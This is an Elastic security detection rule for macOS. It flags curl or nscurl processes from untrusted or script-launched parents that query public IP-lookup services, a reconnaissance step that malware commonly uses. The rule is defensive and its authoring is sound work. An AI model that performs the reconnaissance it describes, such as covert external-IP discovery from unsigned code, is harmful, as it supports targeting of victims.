External IP Address Discovery via Curl
Detects applications making a curl request to a known public IP address lookup web service. Malware commonly performs this action during reconnaissance to assess potential targets and identify the victim's external IP address.
Rule type: eql
Rule indices:
- logs-endpoint.events.process-*
Rule Severity: low
Risk Score: 21
Runs every:
Searches indices from: now-9m
Maximum alerts per execution: ?
References:
Tags:
- Domain: Endpoint
- OS: macOS
- Use Case: Threat Detection
- Tactic: Discovery
- Data Source: Elastic Defend
Version: ?
Rule authors:
- Elastic
Rule license: Elastic License v2
process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and
((process.parent.executable like ("/Applications/*", "/Volumes/*", "/private/var/folders/*")) or
(process.parent.name in ("bash", "sh", "zsh") and process.parent.command_line like "*http*") or
(process.parent.code_signature.trusted == false or process.code_signature.exists == false)) and
process.name in ("curl", "nscurl") and
process.args_count <= 5 and
process.command_line like ("*ip-api.com*", "*ipwho.is*", "*checkip.dyndns.org*", "*api.ipify.org*",
"*whatismyip.akamai.com*", "*ifcfg.me*", "*ifconfig.me*", "*ident.me*",
"*icanhazip.com*", "*ipecho.net*", "*api.myip.com*", "*checkip.amazonaws.com*",
"*wtfismyip.com*", "*iplogger.*", "*freegeoip.net*", "*ipinfo.io*",
"*geoplugin.net*", "*httpbin.org*", "*myip.opendns.com*")
Framework: MITRE ATT&CK
Tactic:
- Name: Discovery
- Id: TA0007
- Reference URL: https://attack.mitre.org/tactics/TA0007/
Technique:
- Name: System Network Configuration Discovery
- Id: T1016
- Reference URL: https://attack.mitre.org/techniques/T1016/
Sub Technique:
- Name: Internet Connection Discovery
- Id: T1016.001
- Reference URL: https://attack.mitre.org/techniques/T1016/001/